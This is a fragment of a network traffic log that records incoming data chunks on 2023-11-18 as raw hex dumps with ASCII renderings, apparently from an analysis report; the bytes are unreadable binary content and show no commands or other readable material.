53 f6 36 3d 53 Data Ascii: 2^(/1:^ym;/_hqM<ky82:ythyt>9{<iys6n<m;~S,3^cc<ox?Ye:3y{_>>h[msm6vcy;os;o;89Ytn[??S6=S
2023-11-18 09:02:40 UTC	5386	IN	Data Raw: c8 91 7e be 7c 4f be d8 93 7a e4 0a e4 48 c7 9b 7e 07 04 72 a4 c3 53 ec 00 c5 fe fd b7 3c b7 00 c5 0e 4f b1 03 14 3b 3c c5 0e 50 ec f0 14 3b 40 b1 e3 6d 7c 4f 0e a2 f9 eb 86 b5 37 c2 ef cc 1a 58 7b 23 3c 33 0f 30 f3 f0 cc 3c c0 cc c3 33 f3 00 33 0f cf cc 03 cc 3c 3c 33 0f 30 f3 2f bf df 75 b4 79 7c 6f e6 af 1b 98 79 dc f5 4c 21 c0 cc c3 33 f3 00 33 8f bb fe ee 0e 30 f3 f0 cc 3c c0 cc c3 33 f3 00 33 0f cf cc 03 cc 3c ee e3 7b 12 cf 9b cf ff 0e e4 7f 87 5f 7b 23 90 8b 1d 9e d0 07 08 7d 78 42 1f 20 f4 e1 09 7d 80 d0 87 27 f4 01 42 1f 9e d0 07 08 7d bc 8f b5 46 01 42 1f 5f 51 fb 87 88 f6 8d ca 5f da 8a 89 57 00 d3 87 4f c8 0e 24 64 c7 c3 0f 96 48 c8 0e 2f 05 02 52 20 bc 14 08 48 81 f0 52 20 20 05 c2 6f 3d 1b 0f 5e 3c ff d0 41 0a 84 4f c8 0e 48 81 f0 52 20 20 Data Ascii: ~\|OzH~rS<O;<P;@m\|O7X{#<30<33<<30/uy\|oyL!330<33<{_{#}xB }'B}FB_Q_WO$dH/R HR o=^<AOHR
2023-11-18 09:02:40 UTC	5402	IN	Data Raw: 5c cb 93 a7 05 f2 b4 3c 79 5a 20 4f cb d3 99 05 3a b3 3c 9d 59 87 a3 f9 23 09 5e f2 db df 0f 71 18 ef 6f 1f 35 e2 56 f2 df 08 ca b2 3c f7 58 e0 1e cb 73 8f 05 ee b1 ae 3e 22 1b 24 62 3f f4 32 15 1b 24 62 fb f9 f3 c6 fc 79 fb c5 5f 37 e6 cf db cf 68 37 66 b4 db 37 b2 6f cc 68 b7 9f 63 6e cc 31 f7 53 b7 26 6c cc 31 b7 2f 01 dc 28 01 dc 7e 39 d6 8d 12 c0 ed 67 46 1b 33 a3 fd f2 a3 bd 38 9a 3f 92 98 ab ec f7 c3 2e 00 be 31 57 d9 7e f6 b0 31 7b d8 7e f6 b0 31 7b d8 be 21 7a a3 21 7a 37 fd c6 df 68 88 de 7e f6 b0 31 7b d8 7e f6 b0 31 7b d8 7e f6 b0 31 7b d8 a1 df c1 1b b3 87 ed 67 0f 1b b3 87 ed 67 0f 1b b3 87 ed 67 0f 1b b3 87 9d ba 0c 7c 63 f6 b0 fd ec 61 63 f6 b0 fd ec 61 63 f6 b0 fd ec 61 63 f6 b0 fd ec 61 63 f6 b0 fd ec 61 63 f6 b0 fd ec 61 63 f6 b0 7d 9e Data Ascii: \<yZ O:<Y#^qo5V<Xs>"$b?2$by_7h7f7ohcn1S&l1/(~9gF38?.1W~1{~1{!z!z7h~1{~1{~1{ggg\|cacacacacacac}
2023-11-18 09:02:40 UTC	5418	IN	Data Raw: 2f aa 02 51 15 1f ac 14 88 aa 78 51 15 88 aa 78 51 15 88 aa 78 51 15 88 aa 78 51 15 88 aa 78 51 15 88 aa f8 60 a5 40 54 c5 07 2b 05 a2 2a 5e 54 05 a2 2a 3e 58 a9 10 55 f5 c1 4a 85 a8 aa 17 55 85 a8 aa 17 55 85 a8 aa 17 55 85 a8 aa 17 55 85 a8 aa 17 55 85 a8 aa 17 55 85 a8 aa 17 55 c5 e0 b1 7a eb 73 b2 02 62 d5 43 ac 02 62 d5 e7 31 15 10 ab 1e 62 15 a2 aa 49 3f 0b aa 10 55 f5 a2 aa 10 55 f5 a2 aa 10 55 cd fe 00 40 54 d5 8b aa 42 54 35 37 bf 37 d4 e6 83 95 0a 51 55 2f aa 0a 51 55 2f aa 0a 51 55 2f aa 0a 51 55 2f aa 0a 51 55 2f aa 0a 51 55 9f c7 54 88 aa 7a 51 55 88 aa be b1 a0 32 57 54 7e 63 49 65 ae a9 ec 69 54 b9 aa f2 1b cb 2a 73 5d 65 4f a3 0a e3 54 9f e3 54 18 a7 fa 1c a7 c2 38 d5 1b a7 c2 38 f5 73 db b7 e2 1a a0 af 7f f8 d3 b6 df fe f6 c7 b6 d7 ff dd Data Ascii: /QxQxQxQxQxQ`@T+^T>XUJUUUUUUUzsbCb1bI?UUU@TBT577QU/QU/QU/QU/QU/QUTzQU2WT~cIeiT*s]eOTT88s
2023-11-18 09:02:40 UTC	5428	IN	Data Raw: c6 ed 65 09 b2 f4 c7 ff fd 80 fa 3f fd eb bf 41 73 43 e5 af 11 78 4b 1e 6f 09 9c 4a eb 0b 19 be 48 cf a9 04 4e 25 cf a9 04 4e 25 cf a9 04 4e 25 cf a9 04 4e 25 cf 29 3c f4 77 fc 43 7f af 53 2b 64 3e 1a 38 95 7f 72 4a a9 10 cc 63 2a 03 53 d9 63 2a 03 53 d9 63 2a 03 53 d9 37 46 19 98 ca 1e 53 19 98 ca 7e 70 2c 83 37 d9 f3 26 03 1c 39 7f 21 c3 67 f3 e0 c8 00 47 f6 e0 c8 00 47 f6 e0 c0 e3 ab c7 3f be fa 3a 15 d1 3c 6f 32 78 93 3d 6f 32 78 93 5b b3 55 49 06 6f b2 e7 4d 06 6f b2 e7 4d 06 6f b2 1f e5 ca 68 8c b2 27 47 06 39 b2 9f 44 c8 68 8c b2 6f 8c 32 80 93 3d 70 32 80 93 3d 70 32 80 93 3d 70 32 80 93 3d 70 32 80 93 3d 70 32 80 93 3d 70 f0 dc f7 f1 cf 7d bf 4e ad 90 f9 68 00 4e f1 8d 51 01 71 8a 27 4e 01 71 8a 27 4e 01 71 8a 27 4e 01 3a 8a 47 47 01 3a 8a 47 47 Data Ascii: e?AsCxKoJHN%N%N%N%)<wCS+d>8rJcScSc*S7FS~p,7&9!gGG?:<o2x=o2x[UIoMoMoh'G9Dho2=p2=p2=p2=p2=p2=p}NhNQq'Nq'Nq'N:GG:GG
2023-11-18 09:02:40 UTC	5444	IN	Data Raw: 9d a8 ae 93 ea 3a 51 5d 27 d5 75 a2 ba 4e aa eb d4 28 a3 cf 56 12 ad 85 a4 b5 90 68 2d 24 ad 85 44 6b 21 69 2d 24 aa d1 ac 1a cd b7 fb 01 21 15 5c a6 82 cb 2a b8 4c 05 97 55 70 99 0a 2e eb 0b 24 32 35 df ac 22 cd 54 a4 59 45 9a a9 48 b3 8a 34 53 c1 65 15 5c a6 82 cb 2a b8 4c c5 93 55 3c 99 8a a7 a8 78 0a 35 b8 a2 06 57 a8 c1 15 d5 5b a1 7a 2b aa b7 42 f5 56 54 6f 85 ea ad a8 de ca 85 de 5e 9b 97 a2 7a 2b 54 3b 45 b5 53 a8 c1 15 35 b8 42 f5 56 54 6f 85 ea ad a8 de 0a 35 b8 a2 06 57 a8 46 8b 2e dc 85 2e dc 45 17 ee 4a f5 56 55 6f 95 ea ad aa de 2a d5 5b 55 ed 54 ea 55 55 b5 53 a9 57 55 f5 aa 4a f5 56 55 6f 95 ea ad aa de 2a d5 5b 55 bd 55 aa b7 aa 7a ab 54 3b 55 fd ad d2 8d 62 55 bd 55 aa b7 aa 7a 6b 54 6f 4d f5 d6 02 f4 90 a6 7a 6b 54 6f 4d fd ad 51 7f 6b Data Ascii: :Q]'uN(Vh-$Dk!i-$!\LUp.$25"TYEH4Se\LU<x5W[z+BVTo^z+T;ES5BVTo5WF..EJVUo[UTUUSWUJVUo[UUzT;UbUUzkToMzkToMQk
2023-11-18 09:02:40 UTC	5476	IN	Data Raw: df 23 2d 20 62 b1 b4 07 04 b2 b6 62 5d be 19 06 60 e9 4f 00 02 90 16 1e d2 02 90 16 3e 6b 2b 00 69 11 fe 05 1a 90 16 a1 3d 20 00 69 11 fe c6 01 a4 85 4f f6 0a 40 5a 78 48 0b 40 5a f8 aa 89 81 64 af f0 9b 9d 05 fc 2d 7c d5 c4 80 bf 45 f8 07 1e 72 c4 62 3f f4 94 0f b6 8b 7d da 15 fa 00 db 85 af 9a 18 60 bb f0 9b 9d 05 d8 2e 7c d5 c4 00 db 85 af 9a 18 60 bb d8 e9 4f 12 e3 e6 73 c4 02 fe 16 3e 47 2c e0 6f 91 fe 39 09 7f 8b d4 1e 10 f0 b7 48 3f 6e f0 b7 48 0d d7 01 7f 0b bf d9 59 c0 df 22 f5 07 3e 01 7f 8b f4 eb 25 f0 b7 f0 39 62 01 7f 0b ef 6f 01 7f 8b 7a e9 27 17 fc 2d bc bf 05 fc 2d ca 2f b3 c0 df c2 fb 5b c0 df c2 a7 96 05 fc 2d ca 3f 27 e1 6f e1 fd 2d e0 6f d1 fa f3 86 80 bf 85 f7 b7 80 bf 45 7f 74 80 01 7f 0b 5f a3 31 e0 6f d1 fe 39 09 7f 0b 5f a3 31 e0 Data Ascii: #- bb]`O>k+i= iO@ZxH@Zd-\|Erb?}`.\|`Os>G,o9H?nHY">%9boz'--/[-?'o-oEt_1o9_1
2023-11-18 09:02:40 UTC	5492	IN	Data Raw: 4d 88 6a 7a 51 4d 88 6a 7a 51 4d 88 6a 7a 51 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d 60 65 7a ac 4c a8 63 7a 75 4c e4 9f e9 f3 cf 04 56 a6 c7 ca 04 56 a6 c7 ca 04 56 a6 c7 ca 04 56 a6 c7 ca 04 56 a6 c7 ca 02 56 96 c7 Data Ascii: MjzQMjzQMjzQMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzM`ezLczuLVVVVVV
2023-11-18 09:02:40 UTC	5508	IN	Data Raw: c4 0e 20 76 3c c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 7e b5 75 fd af b6 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 Data Ascii: v<. v=. v=. v=. v=.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.Du.~u. v=. v=. v=. v=. v=. v=. v=. v=. v=. v=. v=.
2023-11-18 09:02:40 UTC	5524	IN	Data Raw: 13 a0 37 e9 47 78 27 40 6f d2 a1 37 01 7a d3 92 5e 3f ff ef 69 86 8b 5c d2 eb 6f ff 7e 9a e1 22 75 7a 4d a0 d7 14 e4 2a a8 84 e8 6b d2 a3 af 09 d0 9b 82 5c 24 94 10 7d 4d 3a f4 26 40 6f 8a 53 4d 14 26 d0 6b 5a d2 eb 9f 5f 4f 33 0c 89 4e af 09 f4 9a 74 7a 4d a0 d7 a4 d3 6b 02 bd a6 2c 3f a8 12 e8 35 e5 29 6f 0a c0 d0 a4 87 1a 13 30 34 e9 18 9a 80 a1 a9 e8 23 09 0c 4d 3a 86 26 60 68 aa b2 a4 4d c0 d0 a4 63 68 02 86 26 bd a6 38 a1 56 21 e9 b5 0a 09 f4 9a f4 f7 f0 12 e8 35 e9 f4 9a 40 af a9 4d 79 24 41 af 69 49 af ff f8 fd 34 c3 45 ea f4 9a 40 af a9 27 dd 1b 26 40 8f be 26 40 6f 1a fa 23 1f d0 9b 74 e8 4d 80 de 34 a6 7a d8 74 02 f4 a6 a9 5f 24 ea 30 92 1e b4 4d 60 e5 34 e5 24 49 02 2b a7 29 4f 40 06 2b 67 fd e8 b4 8c 58 6f 3e 10 7b b8 20 39 4b 6f df c8 be 5a Data Ascii: 7Gx'@o7z^?i\o~"uzM*k\$}M:&@oSM&kZ_O3NtzMk,?5)o04#M:&`hMch&8V!5@My$AiI4E@'&@&@o#tM4zt_$0M`4$I+)O@+gXo>{ 9KoZ
2023-11-18 09:02:40 UTC	5556	IN	Data Raw: 3f 37 50 7f 6e 64 e9 7b 53 d4 9f 1b 9e 17 0d f0 a2 67 5b ce ad 90 6f 9e 17 0d f0 a2 51 93 1f 0d f9 e6 79 d1 00 2f 1a a5 2b 18 cc 5d d7 2b 05 cf 8b 06 78 d1 dc be d8 b3 69 e1 8e ca f3 a2 01 5e 34 ca 9f df c0 8b 86 e7 45 03 bc 68 6c 5b 94 4f bf 2c 61 18 cd e7 1b 2c ca dc f6 bf 24 de 1a 79 1d 32 a0 43 86 d7 21 03 3a 64 f8 8a 70 03 15 e1 46 fb a7 d8 a8 08 37 bc 45 19 b0 28 a3 fd 33 05 58 94 e1 2d ca 80 45 19 7d d6 e7 00 58 94 e1 2d ca 80 45 19 ed d7 c6 c3 a2 0c af 43 06 74 c8 68 7f 0e 80 0e 19 5e 87 0c e8 90 b1 ad 43 7e b0 bc 01 1d 32 ba ed 68 81 95 67 b1 db d9 bd 24 b0 e8 2c bc 0e 09 e8 90 d8 e9 0c 08 e8 90 f0 3a 24 a0 43 62 a7 af b9 02 3a 24 bc 0e 09 e8 90 f0 35 da 02 3a 24 bc 0e 09 e8 90 d8 69 62 1a d0 21 e1 75 48 40 87 c4 76 dd b4 4f 7f 2d 61 18 6d f8 d1 Data Ascii: ?7Pnd{Sg[oQy/+]+xi^4Ehl[O,a,$y2C!:dpF7E(3X-E}X-ECth^C~2hg$,:$Cb:$5:$ib!uH@vO-am
2023-11-18 09:02:40 UTC	5572	IN	Data Raw: f9 97 35 ec 55 6f 9e f5 15 58 5f 9d f5 2b 54 0b ac af 3c eb 2b b0 be 3a fb f3 16 58 5f 79 d6 57 60 7d 75 f6 cf 19 c0 fa ca b3 be 02 eb ab b3 bf 72 03 eb 2b cf fa 0a ac af ce fa d5 74 05 d6 57 9e f5 15 58 5f 09 d6 f7 f7 35 0c d9 7c bd 81 f5 d5 31 eb 5b eb 0d ac af 7c 4f b7 42 4f b7 ba f8 3b 13 68 72 56 1e 11 16 10 61 5d f4 4b 22 0a 88 b0 3c eb 2b b0 be c7 58 1f 4b 2e 8d 2d e9 f7 49 40 bb ba f8 d9 16 80 76 e5 a1 5d 01 da 95 6f 3b 56 68 3b 56 1e da 15 a0 5d 3d c7 f2 09 29 a0 5d 79 fa 56 a0 6f f5 e6 f7 12 d0 b7 f2 f4 ad 40 df ea 4d bf d6 b7 40 df ca d3 b7 02 7d ab b7 f6 d9 70 54 f6 f4 ad 40 df ea 4d 63 eb 02 7d 2b 4f df 0a f4 ad de f4 8b ad 0b f4 ad 3c 7d 2b d0 b7 7a bb f9 bd 04 15 e0 e9 5b 81 be d5 55 cf 60 2f d0 b7 65 5c a6 48 9f 0b 36 d3 95 4f f7 3a 74 79 Data Ascii: 5UoX_+T<+:X_yW`}ur+tWX_5\|1[\|OBO;hrVa]K"<+XK.-I@v]o;Vh;V]=)]yVo@M@}pT@Mc}+O<}+z[U`/e\H6O:ty
2023-11-18 09:02:40 UTC	5588	IN	Data Raw: 02 24 51 c5 f1 45 91 14 8c f1 14 8c 49 0a c6 78 0a c6 24 d6 b0 8d 03 29 4c bb 53 9e 36 e6 f6 37 0a de 6c 94 d3 c0 39 a1 2f c8 46 19 07 ce c0 a7 1b c6 f9 06 3e e1 30 ce 38 f0 29 87 71 ce f6 37 96 f8 a7 35 e6 73 b6 71 ce c6 e7 6c e3 9c 27 3e e7 69 9c f3 f4 37 36 c6 4f 3b 83 cf 79 1a e7 1c f9 9c e3 38 e7 c8 e7 1c c7 39 c7 bf b1 9d c7 39 27 3e e7 34 ce 39 f1 39 a7 71 ce 99 cb cd a3 dc cc e5 e6 9f e4 f2 b5 ca e3 5a b9 c3 39 cb 5b 98 47 5a 4c 22 2d c6 23 2d 26 91 16 8b 0e ab 5e 98 49 a4 c5 70 9b ca 95 54 74 e3 91 16 93 48 8b 25 0c ce 4c 12 aa c6 13 aa 26 01 1a cb 5c 37 09 94 18 0f 94 98 04 4a 2c 63 67 c8 b2 e8 96 b9 6e 12 5f 31 7c a6 76 25 15 dd 78 7c c5 24 be 62 a5 d2 43 35 26 f9 50 e3 f9 50 93 f0 88 55 1c 47 35 09 8f 18 0f 8f 98 84 47 ac 3a de 93 12 e7 b0 cb Data Ascii: $QEIx$)LS67l9/F>08)q75sql'>i76O;y899'>499qZ9[GZL"-#-&^IpTtH%L&\7J,cgn_1\|v%x\|$bC5&PPUG5G:
2023-11-18 09:02:40 UTC	5620	IN	Data Raw: d0 40 52 09 bf c8 31 66 9c da 05 a5 70 f3 02 32 6e 04 10 88 73 9d 66 aa 2b 79 2e 7e 5a 20 fd 7e 41 47 37 d3 18 2b 3f 78 1c dd 3c 63 3a 78 ef ea 54 53 8d d5 54 a7 9a 6a af d0 59 c2 a3 67 5e 12 7f a5 90 77 8a 9a ae ed 75 3e 83 d5 58 b7 75 ea b6 2e ea f6 cf 7b a6 d4 6d 8d 75 5b a7 6e eb f2 b7 83 8f f7 a0 cc 84 75 5b a7 6e eb b1 42 3b 8b 47 cf cc 84 75 5b a7 6e eb a2 6e bf dc 5f fe 52 b7 35 d6 6d 9d ba ad 57 7c f7 52 b7 f4 1c cf fe 46 9a ba 6d f0 33 58 93 cf 60 0d d6 53 93 7a 6a 9c ed 00 1f 3d 4f e5 36 58 4f 4d ea a9 29 ea e9 cf bf ef 41 79 4d 58 4f 4d ea a9 69 d9 6e cd d1 33 af 09 eb a9 49 3d 35 78 1d 6c 52 4f 0d d6 53 93 7a 6a 46 fa 0c d6 a4 9e 1a ac a7 26 f5 d4 cc f4 29 a2 49 3d 35 58 4f 4d ea a9 29 ea e9 c3 f7 7b 90 ec db d0 4c 6d ea a9 c5 7a 6a 2b d9 bb Data Ascii: @R1fp2nsf+y.~Z ~AG7+?x<c:xTSTjYg^wu>Xu.{mu[nu[nB;Gu[nn_R5mW\|RFm3X`Szj=O6XOM)AyMXOMin3I=5xlROSzjF&)I=5XOM){Lmzj+
2023-11-18 09:02:40 UTC	5636	IN	Data Raw: 27 4f 41 95 b4 78 98 13 c0 9c 5b 5b 9f 71 b6 af 27 4f f1 30 27 80 39 d9 ea 27 bd 01 cc 89 87 39 01 cc c9 3a cc f9 a1 98 03 98 13 0f 73 02 98 13 0f 73 02 98 13 0f 73 02 98 93 dd de e2 95 00 e6 c4 c3 9c 00 e6 64 a7 df bb 06 30 27 1e e6 04 30 27 3b 9f 6f 80 39 f1 35 d9 82 9a 6c d9 c5 ce e3 0b 6a b2 c5 7b 9e c0 f3 64 77 f2 df 0d e7 00 ef 79 02 cf 93 9d 7e ce 15 78 9e 78 cf 13 78 9e 78 cf 13 78 9e 78 cf 13 78 9e ec 7d be c1 f3 c4 0b 9b 40 d8 64 7f b4 9e 27 10 36 f1 c2 26 10 36 11 c2 e6 6f cf 30 8c e6 33 00 c2 26 7b 7f c6 81 b0 89 17 36 81 b0 89 17 36 81 b0 89 17 36 81 b0 c9 5e cf 88 0c aa a4 c5 0b 9b 40 d8 e4 b0 d1 d9 0d 61 13 6f 5e 02 f3 92 83 bf 0f 80 79 89 37 2f 81 79 c9 41 af 79 17 d4 0f 8b 37 2f 81 79 c9 41 2f 07 10 98 97 78 f3 12 98 97 1c a2 b3 1b e6 25 Data Ascii: 'OAx[[q'O0'9'9:sssd0'0';o95lj{dwy~xxxxxxx}@d'6&6o03&{666^@ao^y7/yAy7/yA/x%
2023-11-18 09:02:40 UTC	5652	IN	Data Raw: be b7 eb a3 ec e0 3f d3 23 3e 53 fd ce 87 40 2e 25 7c 2e 25 90 4b 89 9d 76 f2 40 2e 25 7c 2e 25 90 4b 09 ff f2 fa 40 2e 25 7c 2e 25 f0 ad 15 3e 97 12 c8 a5 84 cf a5 04 72 29 b1 e8 1c 6a 20 97 12 3e 97 12 c8 a5 c4 76 2e e5 c7 94 38 90 4b 09 9f 4b 09 e4 52 62 d1 df 06 81 5c 4a f8 5c 4a 20 97 12 db b9 94 5f 7f b9 97 3d 7a f3 b9 94 40 2e 25 44 2e e5 9f f7 32 f4 e6 c7 0d b9 94 10 8b c9 ef fb 86 71 f3 b9 94 40 2e 25 f6 7a 91 70 20 97 12 3e 97 12 c8 a5 c4 41 e7 f7 02 b9 94 f0 b9 94 40 2e 25 0e fa 21 74 20 97 12 3e 97 12 c8 a5 c4 41 03 53 20 97 12 3e 97 12 c8 a5 c4 21 ec 9c 21 90 4b 09 9f 4b 09 e4 52 62 3b 97 f2 e7 1f f7 b2 47 6f 3e 97 12 c8 a5 dc b6 c5 eb 95 6f ed 96 a7 aa 4f ef e2 ef 5f c1 1f 2d e3 a5 32 c4 41 f9 d1 32 9f 2a f7 6b b7 ec 74 3f 76 cf 7b b9 ff ec Data Ascii: ?#>S@.%\|.%Kv@.%\|.%K@.%\|.%>r)j >v.8KKRb\J\J _=z@.%D.2q@.%zp >A@.%!t >AS >!!KKRb;Go>oO_-2A2*kt?v{
2023-11-18 09:02:40 UTC	5668	IN	Data Raw: e9 c6 77 a5 5b dc 95 6e 7c 57 ba c5 5d e9 c6 77 a5 5b dc 95 6e 7c 57 ba c5 5d e9 c6 77 a5 5b dc 95 6e 7c 57 ba c5 5d e9 c6 77 a5 5b dc 95 6e 7c 57 ba c5 5d e9 c6 77 a5 5b dc 95 6e 7c 57 ba c5 5d e9 c6 77 a5 5b dc 95 6e 7c 57 ba c5 5d e9 c6 77 a5 5b dc 95 6e 7c 57 ba c5 5d 69 c2 f4 4d 91 be 89 d3 37 45 fa 26 4e df 14 e9 9b 38 7d 53 a4 6f e2 f4 4d 91 be 89 d3 37 45 fa 26 4e df 14 e9 9b 38 7d 53 a4 6f e2 34 4a 91 46 89 d3 28 45 1a 25 4e a3 14 69 94 38 8d 52 a4 51 e2 34 4a 91 46 89 d3 28 bd a0 51 7e a0 b0 39 d2 28 73 1a e5 48 a3 cc 69 94 23 8d 32 a7 51 8e 34 ca 9c 46 39 d2 28 73 1a e5 48 a3 cc 69 94 23 8d 32 a7 51 8e 34 ca f8 2a f8 b8 b4 44 5c 7a 15 bc 2e 8d b8 85 e3 9e 23 2e a6 6f 8e f4 cd 9c be 39 d2 37 73 fa e6 48 df cc e9 9b 23 7d 33 a7 6f 8e f4 2d 0f 14 Data Ascii: w[n\|W]w[n\|W]w[n\|W]w[n\|W]w[n\|W]w[n\|W]w[n\|W]iM7E&N8}SoM7E&N8}So4JF(E%Ni8RQ4JF(Q~9(sHi#2Q4F9(sHi#2Q4*D\z.#.o97sH#}3o-
2023-11-18 09:02:40 UTC	5684	IN	Data Raw: 01 5e db 83 d7 06 78 ed b3 7f 7e 05 78 6d 0f 5e 1b e0 b5 05 78 fd 76 0f 7b 64 f3 e0 b5 01 5e db af 60 6c 80 d7 f6 e0 b5 01 5e 7b 84 75 1b 1b e0 b5 3d 78 6d 80 d7 1e ed b3 a1 df 3c 78 6d 80 d7 0e bd 9e a4 01 5e db 83 d7 06 78 ed d0 7e 7b 03 bc b6 07 af 0d f0 da be f8 7a 03 bc b6 07 af 0d f0 da e1 df 3b 00 5e db 83 d7 06 78 ed dc d9 b2 ba 0d f0 da 1e bc 36 c0 6b a7 5e 77 d7 00 af ed c1 6b 03 bc b6 07 af 0d f0 da 1e bc 36 c0 6b a7 ae 2d d2 00 af ed c1 6b 03 bc f6 d4 eb 93 1b e0 b5 3d 78 6d 80 d7 9e 9b cf 86 7e f3 e0 b5 01 5e db 83 d7 06 78 6d 0f 5e 1b e0 b5 a7 9e 46 6d 80 d7 f6 e0 b5 01 5e bb b4 e8 d0 00 af ed c1 6b 03 bc 76 e9 f9 d0 06 78 6d 0f 5e 1b e0 b5 4b af 4b 68 80 d7 f6 e0 b5 01 5e db 63 c2 06 26 6c 8f 09 1b 98 b0 7b 67 57 af 34 30 61 7b 4c d8 c0 84 Data Ascii: ^x~xm^xv{d^`l^{u=xm<xm^x~{z;^x6k^wk6k-k=xm~^xm^Fm^kvxm^KKh^c&l{gW40a{L
2023-11-18 09:02:40 UTC	5700	IN	Data Raw: fb 03 bd d7 e9 df 74 ab f5 bb 4f 6b bd 96 6e a8 a5 db e3 5a fa b7 5b 6f 98 68 7a 2d dd 50 4b b7 0c b9 92 40 2d dd fe 53 2d fd 6f 7a 43 2d dd 4a 26 af 0d b5 74 d3 6b e9 86 5a ba 09 e6 ec 97 5b 18 7a d3 c7 0d b5 74 ab b3 9c 44 30 67 9b 5e 4b 37 d4 d2 ad 42 f5 06 1b 6a e9 56 a5 f6 96 c8 9e 3c c8 17 e4 84 39 9b ba 39 9b 30 67 af c7 da e2 f7 d6 74 da c3 4e 7a 6f 67 f4 76 56 e7 64 c2 9c 4d dd 9c 4d 98 b3 29 98 b3 b7 5f 32 d0 9b 3e 6e 78 98 91 d3 e1 20 ce 92 c4 de e8 a9 9b b3 09 73 36 85 cf e3 fd 7a 0b db cf 4d 37 67 13 e6 6c 4e b2 e9 90 30 67 53 37 67 13 e6 6c 4e a1 de 6c 24 cc d9 d4 cd d9 84 39 9b b3 6c f2 25 cc d9 d4 cd d9 84 39 9b ba 39 9b 30 67 53 37 67 13 e6 6c ea 9f c7 4b 98 b3 a9 9b b3 09 73 36 e7 d0 cf 0d e3 a6 9b b3 09 73 36 75 73 36 61 ce a6 6e ce 26 Data Ascii: tOknZ[ohz-PK@-S-ozC-J&tkZ[ztD0g^K7BjV<990gtNzogvVdMM)_2>nx s6zM7glN0gS7glNl$9l%990gS7glKs6s6us6an&
2023-11-18 09:02:40 UTC	5732	IN	Data Raw: b6 aa f5 d7 b6 1f 25 09 ff f0 be 6d ff b5 ed 87 77 95 df a5 6d eb 55 6b 83 1f 21 39 d7 b8 42 97 28 74 39 3f d7 44 a1 8b 2b 74 89 42 97 e3 b7 89 92 24 dc e2 0a 5d a2 d0 e5 2b fd 14 45 89 42 17 57 e8 12 85 2e ee 93 25 3e 59 dc 27 4b 7c b2 b8 4f 96 f8 64 71 9f 2c f1 c9 3a f6 c9 b7 89 af 12 9f 2c ee 93 25 3e 59 3c 09 b7 c4 27 8b fb 64 89 4f 16 f7 c9 12 9f 2c ee 93 25 3e 59 cb 89 2e bf 2f f1 c9 e2 3e 59 e2 93 b5 e0 09 f4 12 9f 2c ee 93 25 3e 59 20 09 f7 e7 bd 99 f4 c6 e3 26 3e b9 95 61 dc 96 39 5b 56 dc 27 4b 7c b2 ce 78 02 bd c4 27 8b fb 64 89 4f d6 79 a1 23 ee 12 9f 2c ee 93 25 3e 59 67 7e bd 89 4f 16 f7 c9 12 9f ac 33 bf 4f 0a 34 16 87 c6 12 68 ac 0b 76 e5 12 68 2c 0e 8d 25 d0 58 fc c3 4e 25 d0 58 1c 1a 4b a0 71 2b 9f 48 57 0a 1f db 7f c1 7b c2 65 d5 66 46 Data Ascii: %mwmUk!9B(t9?D+tB$]+EBW.%>Y'K\|Odq,:,%>Y<'dO,%>Y./>Y,%>Y &>a9[V'K\|x'dOy#,%>Yg~O3O4hvh,%XN%XKq+HW{efF
